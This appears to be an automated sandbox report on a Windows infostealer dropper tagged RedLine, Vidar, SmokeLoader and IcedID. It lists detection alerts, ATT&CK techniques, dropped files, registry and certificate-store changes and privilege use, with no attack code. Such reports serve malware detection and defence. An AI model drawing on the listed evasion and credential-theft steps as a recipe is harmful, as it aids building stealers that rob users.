Malware Analysis Report

2024-08-06 04:26

Sample ID 210918-n8sq6scaeq
Target a4806a7fffe5d04d7ccd764890bd4ef3.exe
SHA256 5248d778a816ffaed27e465deec140f4d79478a4aca7c5968d6eb926ac7c94f1
Tags
redline smokeloader socelars vidar 706 ani aspackv2 backdoor evasion infostealer spyware stealer trojan vmprotect icedid 3162718704 banker suricata
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5248d778a816ffaed27e465deec140f4d79478a4aca7c5968d6eb926ac7c94f1

Threat Level: Known bad

The file a4806a7fffe5d04d7ccd764890bd4ef3.exe was found to be: Known bad.

Malicious Activity Summary

redline smokeloader socelars vidar 706 ani aspackv2 backdoor evasion infostealer spyware stealer trojan vmprotect icedid 3162718704 banker suricata

RedLine Payload

suricata: ET MALWARE Win32/IcedID Request Cookie

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Process spawned unexpected child process

suricata: ET MALWARE Amadey CnC Check-In

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

SmokeLoader

IcedID, BokBot

Socelars

Vidar

suricata: ET MALWARE Win32/Tnega Activity (GET)

Socelars Payload

Modifies Windows Defender Real-time Protection settings

RedLine

Vidar Stealer

VMProtect packed file

Executes dropped EXE

Downloads MZ/PE file

ASPack v2.12-2.42

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Maps connected drives based on registry

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Checks SCSI registry key(s)

Kills process with taskkill

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Delays execution with timeout.exe

Modifies system certificate store

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Persistence
TA0003
Modify Existing Service
T1031
Scheduled Task
T1053
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Disabling Security Tools
T1089
Install Root Certificate
T1130
Credential Access
TA0006
Credentials in Files
T1081
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040

Analysis: static1

Detonation Overview

Reported

2021-09-18 12:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-18 12:04

Reported

2021-09-18 12:07

Platform

win7-en-20210916

Max time kernel

32s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22214190470.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2236d9fce9bd29d13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed224b216a9b264.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22d29285f2462824d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2246f9dc6f4f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22398ca1246818a50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T9R74.tmp\___YHDG34.exe N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22d29285f2462824d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22d29285f2462824d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2236d9fce9bd29d13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22214190470.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
